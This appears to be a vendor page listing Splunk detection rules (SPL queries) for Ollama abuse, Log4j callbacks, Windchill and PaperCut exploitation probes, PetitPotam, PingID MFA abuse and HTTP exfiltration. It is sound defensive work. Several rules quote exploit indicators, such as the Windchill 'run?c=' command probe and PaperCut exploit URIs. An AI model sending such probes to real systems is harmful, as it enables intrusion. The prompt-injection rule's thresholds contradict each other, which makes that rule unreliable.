
Splunk ESCU

2,101 vendor-native detections · ready to paste into your SIEM · cross-linked to ATT&CK

Detections

Splunk ESCU · SPL · T1499
Ollama Possible Memory Exhaustion Resource Abuse
Detects abnormal memory allocation patterns and excessive runner operations in Ollama that may indicate resource exhaustion attacks, memory abuse through malicious model loading, or attempts to degrade system performance by overwhelming GPU/CPU resources. Adversaries may deliberately load multiple large models, trigger repeated model initialization cycles, or exploit memory allocation mechanisms to exhaust available system resources, causing denial of service conditions or degrading performance for legitimate users.
`ollama_server` ("*llama_kv_cache*" OR "*compute buffer*" OR "*llama runner started*" OR "*loaded runners*")
| rex field=_raw "count=(?<runner_count>\d+)"
| rex field=_raw "size\s*=\s*(?<memory_mb>[\d\.]+)\s+MiB"
| rex field=_raw "started in\s*(?<load_time>[\d\.]+)\s*seconds"
| rex field=_raw "source=(?<code_source>[^\s]+)"
| bin _time span=5m
| stats count as operations, sum(runner_count) as total_runners, dc(code_source) as unique_sources, values(code_source) as code_sources, avg(memory_mb) as avg_memory, max(memory_mb) as max_memory, sum(memory_mb) as total_memory, avg(load_time) as avg_load_time, max(load_time) as max_load_time by _time, host
| where operations > 5 OR total_runners > 0 OR max_memory > 400 OR total_memory > 500
| eval avg_memory=round(avg_memory, 2)
| eval max_memory=round(max_memory, 2)
| eval total_memory=round(total_memory, 2)
| eval avg_load_time=round(avg_load_time, 2)
| eval severity=case( max_memory > 500 OR total_memory > 1000, "critical", max_memory > 400 OR operations > 20, "high", operations > 10, "medium", 1=1, "low" )
| eval attack_type="Resource Exhaustion / Memory Abuse"
| sort -_time
| table _time, host, operations, total_runners, unique_sources, avg_memory, max_memory, total_memory, avg_load_time, max_load_time, severity, attack_type
| `ollama_possible_memory_exhaustion_resource_abuse_filter`
Splunk ESCU · SPL · T1048
Ollama Possible Model Exfiltration Data Leakage
Detects data leakage and exfiltration attempts targeting Ollama model metadata and configuration endpoints. Adversaries repeatedly query /api/show, /api/tags, and /api/v1/models to systematically extract sensitive model information including architecture details, fine-tuning parameters, system paths, Modelfile configurations, and proprietary customizations. Multiple inspection attempts within a 15-minute window indicate automated exfiltration of valuable intellectual property such as custom model configurations, system prompts, and internal model specifications. This activity represents unauthorized data disclosure that could enable competitive intelligence gathering, model replication, or preparation for advanced attacks against the AI infrastructure.
`ollama_server`
| rex field=_raw "\|\s+(?<status_code>\d+)\s+\|\s+(?<response_time>[\d\.]+)s\s+\|\s+(?<src_ip>[\:\da-f\.]+)\s+\|\s+(?<http_method>\w+)\s+\"(?<uri_path>[^\"]+)\""
| eval src=src_ip
| eval dest=uri_path
| where response_time > 55
| bin _time span=15m
| stats count, avg(response_time) as avg_response_time, max(response_time) as max_response_time by _time, src, dest, uri_path
| eval avg_response_time=round(avg_response_time, 2)
| eval max_response_time=round(max_response_time, 2)
| eval severity=case( avg_response_time > 50, "high", avg_response_time > 40, "medium", 1=1, "low" )
| eval attack_type="Potential Data Exfiltration"
| sort -_time
| stats count by _time, src, uri_path, avg_response_time, max_response_time, severity, attack_type
| `ollama_possible_model_exfiltration_data_leakage_filter`
Splunk ESCU · SPL · T1190
Ollama Possible RCE via Model Loading
Detects Ollama server errors and failures during model loading operations that may indicate malicious model injection, path traversal attempts, or exploitation of model loading mechanisms to achieve remote code execution. Adversaries may attempt to load specially crafted malicious models or exploit vulnerabilities in the model loading process to execute arbitrary code on the server. This detection monitors error messages and failure patterns that could signal attempts to abuse model loading functionality for malicious purposes.
`ollama_server` level=ERROR ("*llama runner*" OR "*model*" OR "*server.go*" OR "*exited*")
| rex field=_raw "source=(?<code_source>[^\s]+)"
| rex field=_raw "msg=\"(?<msg>[^\"]+)\""
| rex field=_raw "err=\"(?<err>[^\"]+)\""
| rex field=_raw "level=(?<log_level>\w+)"
| eval error_type=case( match(_raw, "exited"), "service_crash", match(_raw, "model"), "model_error", match(_raw, "llama runner"), "runner_error", 1=1, "unknown_error" )
| bin _time span=1h
| stats count as error_count, earliest(_time) as first_error, latest(_time) as last_error, values(msg) as error_messages, values(err) as error_details, values(code_source) as code_sources, values(error_type) as error_types, dc(error_type) as unique_error_types by host
| where error_count > 0
| eval first_error=strftime(first_error, "%Y-%m-%d %H:%M:%S")
| eval last_error=strftime(last_error, "%Y-%m-%d %H:%M:%S")
| eval severity=case( match(error_details, "exit status") OR error_count > 5, "critical", error_count > 2, "high", 1=1, "medium" )
| eval attack_type="Suspicious Model Loading / Potential RCE"
| stats count by first_error, last_error, host, code_sources, error_count, unique_error_types, error_types, error_messages, error_details, severity, attack_type
| `ollama_possible_rce_via_model_loading_filter`
Splunk ESCU · SPL · T1190, T1059
Ollama Suspicious Prompt Injection Jailbreak
Detects potential prompt injection or jailbreak attempts against Ollama API endpoints by identifying requests with abnormally long response times. Attackers often craft complex, layered prompts designed to bypass AI safety controls, which typically result in extended processing times as the model attempts to parse and respond to these malicious inputs. This detection monitors /api/generate and /api/chat endpoints for requests exceeding 30 seconds, which may indicate sophisticated jailbreak techniques, multi-stage prompt injections, or attempts to extract sensitive information from the model.
`ollama_server` "GIN" ("*/api/generate*" OR "*/v1/chat/completions*")
| rex field=_raw "\|\s+(?<status_code>\d+)\s+\|\s+(?<response_time>[\dm\.]+[a-z]+)\s+\|\s+(?<src_ip>[\:\da-f\.]+)\s+\|\s+(?<http_method>\w+)\s+\"(?<uri_path>[^\"]+)\""
| rex field=response_time "^(?:(?<minutes>\d+)m)?(?<seconds>[\d\.]+)s$"
| eval response_time_seconds=if(isnotnull(minutes), tonumber(minutes)*60+tonumber(seconds), tonumber(seconds))
| eval src=src_ip
| where response_time_seconds > 30
| bin _time span=10m
| stats count as long_request_count, avg(response_time_seconds) as avg_response_time, max(response_time_seconds) as max_response_time, values(uri_path) as uri_path, values(status_code) as status_codes by _time, src, host
| where long_request_count > 170
| eval avg_response_time=round(avg_response_time, 2)
| eval max_response_time=round(max_response_time, 2)
| eval severity=case( long_request_count > 50 OR max_response_time > 55, "critical", long_request_count > 20 OR max_response_time > 40, "high", 1=1, "medium" )
| eval attack_type="Potential Prompt Injection / Jailbreak"
| table _time, host, src, uri_path, long_request_count, avg_response_time, max_response_time, status_codes, severity, attack_type
| `ollama_suspicious_prompt_injection_jailbreak_filter`
Splunk ESCU · SPL · T1190, T1133
Outbound Network Connection from Java Using Default Ports
The following analytic detects outbound network connections from Java processes to the default ports used by the LDAP and RMI protocols, which may indicate exploitation of the Log4j vulnerability CVE-2021-44228. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and network traffic logs. Monitoring this activity is crucial as it can signify an attacker's attempt to perform JNDI lookups and retrieve malicious payloads. If confirmed malicious, this activity could lead to remote code execution and further compromise of the affected server.
| tstats `security_content_summariesonly` count
  FROM datamodel=Endpoint.Processes
  WHERE Processes.process_name IN ("java.exe", "javaw.exe")
  BY _time Processes.action Processes.dest Processes.original_file_name
     Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid
     Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path
     Processes.process Processes.process_exec Processes.process_guid
     Processes.process_hash Processes.process_id Processes.process_integrity_level
     Processes.process_name Processes.process_path Processes.user
     Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| join process_id dest
  [
    | tstats `security_content_summariesonly` count
      FROM datamodel=Network_Traffic.All_Traffic
      WHERE All_Traffic.dest_port IN (389, 636, 1099, 1389)
      BY _time All_Traffic.action All_Traffic.app All_Traffic.bytes
         All_Traffic.bytes_in All_Traffic.bytes_out All_Traffic.dest
         All_Traffic.dest_ip All_Traffic.dest_port All_Traffic.dvc
         All_Traffic.protocol All_Traffic.protocol_version All_Traffic.src
         All_Traffic.src_ip All_Traffic.src_port All_Traffic.transport
         All_Traffic.user All_Traffic.vendor_product All_Traffic.direction
         All_Traffic.process_id
    | `drop_dm_object_name(All_Traffic)`
    | rename dest as connection_to_CNC
    | rename src as dest
  ]
| table _time dest
        parent_process_path parent_process_name parent_process
        process_path process_name process process_hash
        connection_to_CNC dest_port user
| `outbound_network_connection_from_java_using_default_ports_filter`
Splunk ESCU · SPL · T1546.008
Overwriting Accessibility Binaries
The following analytic detects modifications to Windows accessibility binaries such as sethc.exe, utilman.exe, osk.exe, Magnify.exe, Narrator.exe, DisplaySwitch.exe, and AtBroker.exe. It leverages filesystem activity data from the Endpoint.Filesystem data model to identify changes to these specific files. This activity is significant because adversaries can exploit these binaries to gain unauthorized access or execute commands without logging in. If confirmed malicious, this could allow attackers to bypass authentication mechanisms, potentially leading to unauthorized system access and further compromise of the environment.
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path
  from datamodel=Endpoint.Filesystem
  where (Filesystem.file_path=*\\Windows\\System32\\sethc.exe* OR Filesystem.file_path=*\\Windows\\System32\\utilman.exe* OR Filesystem.file_path=*\\Windows\\System32\\osk.exe* OR Filesystem.file_path=*\\Windows\\System32\\Magnify.exe* OR Filesystem.file_path=*\\Windows\\System32\\Narrator.exe* OR Filesystem.file_path=*\\Windows\\System32\\DisplaySwitch.exe* OR Filesystem.file_path=*\\Windows\\System32\\AtBroker.exe*)
  by Filesystem.action Filesystem.dest Filesystem.file_access_time Filesystem.file_create_time
     Filesystem.file_hash Filesystem.file_modify_time Filesystem.file_name Filesystem.file_path
     Filesystem.file_acl Filesystem.file_size Filesystem.process_guid Filesystem.process_id
     Filesystem.user Filesystem.vendor_product
| `drop_dm_object_name(Filesystem)`
| `security_content_ctime(lastTime)`
| `security_content_ctime(firstTime)`
| `overwriting_accessibility_binaries_filter`
Splunk ESCU · SPL · T1190, T1059
PTC Windchill GW READY OK Probe
This analytic detects Windchill MethodServer log4j events that contain the CVE-2026-4681 exploitation probe `run?c=echo%20GW_READY_OK`. PTC identifies `GW_READY_OK` and related `run?c=` activity as log indicators associated with Windchill and FlexPLM exploitation. This behavior is significant because attackers use the probe to confirm that a staged gateway component is reachable before sending operating system commands through the same `c=` parameter.
`windchill_log4j`
("GW_READY_OK" OR "run?c=echo%20GW_READY_OK" OR "c=echo%20GW_READY_OK")
| rex field=_raw "^(?:[^:\r\n]+:)?(?<log_ts>\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2},\d{3})\s+(?<log_level>\w+)\s+\[(?<thread>[^\]]+)\]\s+(?<logger>\S+)\s+-\s+(?<payload>.*)$"
| search logger IN ("wt.servlet.ServletRequestMonitor.request", "wt.method.MethodContextMonitor.contexts.servletRequest")
| rex field=payload "^(?<event_ts>\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2}\.\d{3})\s+(?<event_tz>[+\-]\d{4}),\s+(?<rest>.*)$"
| eval parts=split(rest,", ")
| eval event_type=case(logger="wt.servlet.ServletRequestMonitor.request","servlet_request",logger="wt.method.MethodContextMonitor.contexts.servletRequest","method_context_servlet_request",true(),"other")
| eval src_ip=case(event_type="servlet_request",mvindex(parts,2),event_type="method_context_servlet_request",mvindex(parts,5))
| eval uri_path=case(event_type="servlet_request",mvindex(parts,3),event_type="method_context_servlet_request",mvindex(parts,8))
| eval query_string=if(event_type="servlet_request",mvindex(parts,4),null())
| eval http_method=if(event_type="servlet_request",mvindex(parts,5),null())
| eval status=if(event_type="servlet_request",tonumber(mvindex(parts,6)),null())
| rex field=uri_path "^(?<uri_only>[^\?]+)(?:\?(?<uri_query>.*))?$"
| eval query_string=if(query_string="-",null(),query_string)
| eval query_string=coalesce(query_string,uri_query)
| rex field=query_string "(?i)(?:^|&)(?<query_param>[cp])=(?<query_value>[^&]*)"
| eval query_param=lower(query_param), query_value=urldecode(replace(query_value,"\+","%20"))
| where query_param="c" AND match(query_value,"(?i)^echo(\s|20)+GW_READY_OK$")
| eval src=src_ip, activity="gw_ready_ok_probe"

| stats count min(_time) as firstTime
              max(_time) as lastTime
              values(log_level) as log_level
              values(logger) as logger
              values(http_method) as http_method
              values(status) as status
              values(uri_only) as uri_path
              values(query_string) as query_string
  by src activity query_param query_value

| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `ptc_windchill_gw_ready_ok_probe_filter`
Splunk ESCU · SPL · T1190, T1059, T1005
PTC Windchill Gateway Command Execution
This analytic detects Windchill MethodServer log4j events showing suspicious `c=` command execution or `p=` file read parameters sent to Windchill gateway paths associated with CVE-2026-4681 exploitation. PTC identifies `run?c=`, `run?p=`, `.jsp?c=`, and `.jsp?p=` request patterns as indicators to monitor during Windchill and FlexPLM exploitation response. Successful activity may allow an unauthenticated attacker to execute operating system commands or read files through a weaponized gateway or JSP component.
`windchill_log4j`
("WindchillGW/GW/run" OR "WindchillAuthGW/GW/run" OR "/GW/run?" OR "run?c=" OR "run?p=" OR ".jsp?c=" OR ".jsp?p=" OR "dpr_")
| rex field=_raw "^(?:[^:\r\n]+:)?(?<log_ts>\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2},\d{3})\s+(?<log_level>\w+)\s+\[(?<thread>[^\]]+)\]\s+(?<logger>\S+)\s+-\s+(?<payload>.*)$"
| search logger IN ("wt.servlet.ServletRequestMonitor.request", "wt.method.MethodContextMonitor.contexts.servletRequest")
| rex field=payload "^(?<event_ts>\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2}\.\d{3})\s+(?<event_tz>[+\-]\d{4}),\s+(?<rest>.*)$"
| eval parts=split(rest,", ")
| eval event_type=case(logger="wt.servlet.ServletRequestMonitor.request","servlet_request",logger="wt.method.MethodContextMonitor.contexts.servletRequest","method_context_servlet_request",true(),"other")
| eval src_ip=case(event_type="servlet_request",mvindex(parts,2),event_type="method_context_servlet_request",mvindex(parts,5))
| eval uri_path=case(event_type="servlet_request",mvindex(parts,3),event_type="method_context_servlet_request",mvindex(parts,8))
| eval query_string=if(event_type="servlet_request",mvindex(parts,4),null())
| eval http_method=if(event_type="servlet_request",mvindex(parts,5),null())
| eval status=if(event_type="servlet_request",tonumber(mvindex(parts,6)),null())
| rex field=uri_path "^(?<uri_only>[^\?]+)(?:\?(?<uri_query>.*))?$"
| eval query_string=if(query_string="-",null(),query_string)
| eval query_string=coalesce(query_string,uri_query)
| rex field=query_string "(?i)(?:^|&)(?<query_param>[cp])=(?<query_value>[^&]*)"
| eval query_param=lower(query_param), query_value=urldecode(replace(query_value,"\+","%20"))
| where isnotnull(uri_only) AND isnotnull(query_param)
| where (match(uri_only,"(?i)(^|/)GW/run$") OR match(uri_only,"(?i)/servlet/(WindchillGW|WindchillAuthGW)/GW/run$") OR match(uri_only,"(?i)(^|/)dpr_[0-9a-f]{8}\.jsp$")) AND (query_param="c" OR query_param="p")
| where NOT (query_param="c" AND match(query_value,"(?i)^echo(\s|20)+GW_READY_OK$"))
| eval activity=case(query_param="c","command_execution_parameter",query_param="p","file_read_parameter",true(),"unknown")
| eval src=src_ip

| stats count min(_time) as firstTime
              max(_time) as lastTime
              values(log_level) as log_level
              values(logger) as logger
              values(http_method) as http_method
              values(status) as status
              values(uri_only) as uri_path
              values(query_string) as query_string
  by src activity query_param query_value

| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `ptc_windchill_gateway_command_execution_filter`
Splunk ESCU · SPL · T1190, T1133
PaperCut NG Remote Web Access Attempt
The following analytic detects potential exploitation attempts on publicly accessible PaperCut NG servers. It identifies connections from public IP addresses to the server, specifically monitoring URI paths commonly used in proof-of-concept scripts for exploiting PaperCut NG vulnerabilities. This detection leverages web traffic data from the `Web` datamodel, focusing on specific URI paths and excluding internal IP ranges. This activity is significant as it may indicate an attempt to exploit known vulnerabilities in PaperCut NG, potentially leading to unauthorized access or control of the server. If confirmed malicious, attackers could gain administrative access, leading to data breaches or further network compromise.
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime
  from datamodel=Web
  where Web.url IN (
          "*/app?service=direct/1/PrinterDetails/printerOptionsTab.tab",
          "*/app?service=direct/1/PrinterList/selectPrinter&sp=*",
          "*/app?service=page/PrinterList",
          "*/app?service=page/SetupCompleted"
        )
    NOT Web.src IN (
          "10.0.0.0/8",
          "172.16.0.0/12",
          "192.168.0.0/16",
          "100.64.0.0/10",
          "127.0.0.0/8",
          "169.254.0.0/16",
          "192.0.0.0/24",
          "192.0.0.0/29",
          "192.0.0.8/32",
          "192.0.0.9/32",
          "192.0.0.10/32",
          "192.0.0.170/32",
          "192.0.0.171/32",
          "192.0.2.0/24",
          "192.31.196.0/24",
          "192.52.193.0/24",
          "192.88.99.0/24",
          "224.0.0.0/4",
          "192.175.48.0/24",
          "198.18.0.0/15",
          "198.51.100.0/24",
          "203.0.113.0/24",
          "240.0.0.0/4",
          "::1"
        )
  by Web.http_user_agent Web.http_method Web.url Web.url_length Web.src Web.dest Web.dest_port
| `drop_dm_object_name("Web")`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `papercut_ng_remote_web_access_attempt_filter`
Splunk ESCU · SPL · T1190, T1133
PaperCut NG Suspicious Behavior Debug Log
The following analytic identifies potential exploitation attempts on a PaperCut NG server by analyzing its debug log data. It detects unauthorized or suspicious access attempts from public IP addresses and searches for specific URIs associated with known exploits. The detection leverages regex to parse unstructured log data, focusing on admin login activities. This activity is significant as it can indicate an active exploitation attempt on the server. If confirmed malicious, attackers could gain unauthorized access, potentially leading to data breaches or further compromise of the server.
`papercutng` (loginType=Admin OR userName=admin)
| eval uri_match=if(match(_raw, "(?i)(\/app\?service=page\/SetupCompleted|\/app|\/app\?service=page\/PrinterList|\/app\?service=direct\/1\/PrinterList\/selectPrinter&sp=l1001|\/app\?service=direct\/1\/PrinterDetails\/printerOptionsTab\.tab)"), "URI matches", null())
| eval ip_match=if(match(_raw, "(?i)((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))") AND NOT match(_raw, "(?i)(10\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|(172\.(1[6-9]|2[0-9]|3[0-1])\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|(192\.168\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))"), "IP matches", null())
| where (isnotnull(uri_match) OR isnotnull(ip_match))
| stats sparkline, count, values(uri_match) AS uri_match, values(ip_match) AS ip_match, latest(_raw) BY host, index, sourcetype
| `papercut_ng_suspicious_behavior_debug_log_filter`
Splunk ESCU · SPL · T1222
Permission Modification using Takeown App
The following analytic detects the modification of file or directory permissions using the takeown.exe Windows application. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include process GUID, process name, and command-line details. This activity is significant because it is a common technique used by ransomware to take ownership of files or folders for encryption or deletion. If confirmed malicious, this could lead to unauthorized access, data encryption, or data destruction, severely impacting the integrity and availability of critical data.
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes
  WHERE Processes.process_name = "takeown.exe" Processes.process = "*/f*"
  BY Processes.action Processes.dest Processes.original_file_name
     Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid
     Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path
     Processes.process Processes.process_exec Processes.process_guid
     Processes.process_hash Processes.process_id Processes.process_integrity_level
     Processes.process_name Processes.process_path Processes.user
     Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `permission_modification_using_takeown_app_filter`
Splunk ESCU · SPL · T1187
PetitPotam Network Share Access Request
The following analytic detects network share access requests indicative of the PetitPotam attack (CVE-2021-36942). It leverages Windows Event Code 5145, which logs attempts to access network share objects. This detection is significant as PetitPotam can coerce authentication from domain controllers, potentially leading to unauthorized access. If confirmed malicious, this activity could allow attackers to escalate privileges or move laterally within the network, posing a severe security risk. Ensure Event Code 5145 is enabled via Group Policy to utilize this analytic effectively.
`wineventlog_security` SubjectUserName="ANONYMOUS LOGON" EventCode=5145 RelativeTargetName=lsarpc
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest, SubjectUserSid, ShareName,
       src, AccessMask, AccessReason
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `petitpotam_network_share_access_request_filter`
Splunk ESCU · SPL · T1003
PetitPotam Suspicious Kerberos TGT Request
The following analytic detects a suspicious Kerberos Ticket Granting Ticket (TGT) request, identified by Event Code 4768. This detection leverages Windows Security Event Logs to identify TGT requests with unusual fields, which may indicate the use of tools like Rubeus following the exploitation of CVE-2021-36942 (PetitPotam). This activity is significant as it can signal an attacker leveraging a compromised certificate to request Kerberos tickets, potentially leading to unauthorized access. If confirmed malicious, this could allow attackers to escalate privileges and persist within the environment, posing a severe security risk.
`wineventlog_security` EventCode=4768 src!="::1" TargetUserName=*$ CertThumbprint!=""
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest, TargetUserName, src,
       action
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `petitpotam_suspicious_kerberos_tgt_request_filter`
Splunk ESCU · SPL · T1497.003
Ping Sleep Batch Command
The following analytic identifies the execution of ping sleep batch commands. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process command-line details. This activity is significant as it indicates an attempt to delay malicious code execution, potentially evading detection or sandbox analysis. If confirmed malicious, this technique allows attackers to bypass security measures, making it harder to detect and analyze their activities, thereby increasing the risk of prolonged unauthorized access and potential data exfiltration.
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime
  FROM datamodel=Endpoint.Processes
  WHERE
  (
      Processes.parent_process = "*ping*"
      Processes.parent_process = *-n*
      Processes.parent_process IN ("*& *", "*&amp;*", "*&C:*", "*&gt;*", "*>*")
  )
  OR
  (
      (Processes.process_name = "ping.exe" OR Processes.original_file_name = "ping.exe")
      Processes.process = *-n*
      Processes.process IN ("*& *", "*&amp;*", "*&C:*", "*&gt;*", "*>*")
  )
  BY Processes.action Processes.dest Processes.original_file_name
     Processes.parent_process Processes.parent_process_exec
     Processes.parent_process_guid Processes.parent_process_id
     Processes.parent_process_name Processes.parent_process_path
     Processes.process Processes.process_exec Processes.process_guid
     Processes.process_hash Processes.process_id Processes.process_integrity_level
     Processes.process_name Processes.process_path Processes.user
     Processes.user_id Processes.vendor_product
| `drop_dm_object_name("Processes")`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `ping_sleep_batch_command_filter`
PingID Mismatch Auth Source and Verification Response
The following analytic identifies discrepancies between the IP address of an authentication event and the IP address of the verification response event, focusing on differences in the originating countries. It leverages JSON logs from PingID, comparing the 'auth_Country' and 'verify_Country' fields. This activity is significant as it may indicate suspicious sign-in behavior, such as account compromise or unauthorized access attempts. If confirmed malicious, this could allow attackers to bypass authentication mechanisms, potentially leading to unauthorized access to sensitive systems and data.
`pingid` ("result.status" IN ("SUCCESS*","FAIL*","UNSUCCESSFUL*") NOT "result.message" IN ("*pair*","*create*","*delete*"))
| eval user = upper('actors{}.name'), session_id = 'resources{}.websession', dest = 'resources{}.ipaddress', reason = 'result.message', object = 'resources{}.devicemodel', status = 'result.status'
| join user session_id
  [ search `pingid` ("result.status" IN ("POLICY") AND "resources{}.ipaddress"=*) AND "result.message" IN("*Action: Authenticate*","*Action: Approve*","*Action: Allowed*")
    | rex field=result.message "IP Address: (?:N\/A)?(?<policy_ipaddress>.+)?\n"
    | rex field=result.message "Action: (?:N\/A)?(?<signature>.+)?\n"
    | rex field=result.message "Requested Application Name: (?:N\/A)?(?<Requested_Application_Name>.+)?\n"
    | rex field=result.message " Requested Application ID: (?:N\/A)?(?<Requested_Application_ID>.+)?\n"
    | eval user = upper('actors{}.name'), session_id = 'resources{}.websession', src = coalesce('resources{}.ipaddress',policy_ipaddress), app = coalesce(Requested_Application_ID,Requested_Application_Name)
    | fields app, user, session_id, src, signature ]
| iplocation prefix=auth_ dest
| iplocation prefix=verify_ src
| stats count min(_time) as firstTime max(_time) as lastTime values(app) as app values(session_id) as session_id by user, dest, auth_Country, src, verify_Country, object, signature, status, reason
| where auth_Country != verify_Country
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `pingid_mismatch_auth_source_and_verification_response_filter`
Splunk ESCU · SPL · T1621, T1078, T1110
PingID Multiple Failed MFA Requests For User
The following analytic identifies multiple failed multi-factor authentication (MFA) requests for a single user within a PingID environment. It triggers when 10 or more MFA prompts fail within 10 minutes, using JSON logs from PingID. This activity is significant as it may indicate an adversary attempting to bypass MFA by bombarding the user with repeated authentication requests. If confirmed malicious, this could lead to unauthorized access, as the user might eventually accept the fraudulent request, compromising the security of the account and potentially the entire network.
`pingid` "result.status" IN ("FAILURE,authFail","UNSUCCESSFUL_ATTEMPT")
| eval time = _time, src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user = upper('actors{}.name'), object = 'resources{}.devicemodel', reason = 'result.message'
| bucket span=10m _time
| stats dc(_raw) AS mfa_prompts min(time) as firstTime, max(time) as lastTime values(src) as src by user, reason, _time
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| where mfa_prompts >= 10
| `pingid_multiple_failed_mfa_requests_for_user_filter`
PingID New MFA Method After Credential Reset
The following analytic identifies the provisioning of a new MFA device shortly after a password reset. It detects this activity by correlating Windows Event Log events for password changes (EventID 4723, 4724) with PingID logs indicating device pairing. This behavior is significant as it may indicate a social engineering attack where a threat actor impersonates a valid user to reset credentials and add a new MFA device. If confirmed malicious, this activity could allow an attacker to gain persistent access to the compromised account, bypassing traditional security measures.
`pingid` "result.message" = "*Device Paired*"
| rex field=result.message "Device (Unp)?(P)?aired (?<device_extract>.+)"
| eval src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user = upper('actors{}.name'), reason = 'result.message'
| eval object=CASE(ISNOTNULL('resources{}.devicemodel'),'resources{}.devicemodel',true(),device_extract)
| eval action=CASE(match('result.message',"Device Paired*"),"created",match('result.message', "Device Unpaired*"),"deleted")
| stats count min(_time) as firstTime, max(_time) as lastTime, values(reason) as reason by src,user,action,object
| join type=outer user
  [| search `wineventlog_security` EventID IN(4723,4724)
    | eval PW_Change_Time = _time, user = upper(user)
    | fields user,src_user,EventID,PW_Change_Time]
| eval timeDiffRaw = round(lastTime - PW_Change_Time)
| eval timeDiff = replace(tostring(abs(timeDiffRaw) ,"duration"),"(\d*)\+*(\d+):(\d+):(\d+)","\2 hours \3 minutes")
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `security_content_ctime(PW_Change_Time)`
| where timeDiffRaw > 0 AND timeDiffRaw < 3600
| `pingid_new_mfa_method_after_credential_reset_filter`
PingID New MFA Method Registered For User
The following analytic detects the registration of a new Multi-Factor Authentication (MFA) method for a PingID (PingOne) account. It leverages JSON logs from PingID, specifically looking for successful device pairing events. This activity is significant as adversaries who gain unauthorized access to a user account may register a new MFA method to maintain persistence. If confirmed malicious, this could allow attackers to bypass existing security measures, maintain long-term access, and potentially escalate their privileges within the compromised environment.
`pingid` "result.message"="Device Paired*" result.status="SUCCESS"   | rex field=result.message "Device (Unp)?(P)?aired (?<device_extract>.+)" | eval src = coalesce('resources{}.ipaddress','resources{}.devicemodel'), user = upper('actors{}.name'), reason = 'result.message' | eval object=CASE(ISNOTNULL('resources{}.devicemodel'),'resources{}.devicemodel',true(),device_extract) | eval action=CASE(match('result.message',"Device Paired*"),"created",match('result.message', "Device Unpaired*"),"deleted") | stats count min(_time) as firstTime, max(_time) as lastTime by src,user,object,action,reason | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `pingid_new_mfa_method_registered_for_user_filter`
Splunk ESCU SPL T1048.003 ↗
Plain HTTP POST Exfiltrated Data
The following analytic detects potential data exfiltration using plain HTTP POST requests. It leverages network traffic logs, specifically monitoring the `stream_http` data source for POST methods containing suspicious form data such as "wermgr.exe" or "svchost.exe". This activity is significant because it is commonly associated with malware like Trickbot, trojans, keyloggers, or APT adversaries, which use plain text HTTP POST requests to communicate with remote C2 servers. If confirmed malicious, this activity could lead to unauthorized data exfiltration, compromising sensitive information and potentially leading to further network infiltration.
`stream_http` http_method=POST form_data IN ("*wermgr.exe*","*svchost.exe*", "*name=\"proclist\"*","*ipconfig*", "*name=\"sysinfo\"*", "*net view*")
  | stats values(form_data) as http_request_body min(_time) as firstTime max(_time) as lastTime count
    BY src_ip dest_ip http_method
       http_user_agent uri_path url
       bytes_in bytes_out
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `plain_http_post_exfiltrated_data_filter`
Splunk ESCU SPL T1555.003 ↗
Possible Browser Pass View Parameter
The following analytic identifies processes with command-line parameters associated with web browser credential dumping tools, specifically targeting behaviors used by Remcos RAT malware. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and specific file paths. This activity is significant as it indicates potential credential theft, a common tactic in broader cyber-espionage campaigns. If confirmed malicious, attackers could gain unauthorized access to sensitive web credentials, leading to further system compromise and data breaches.
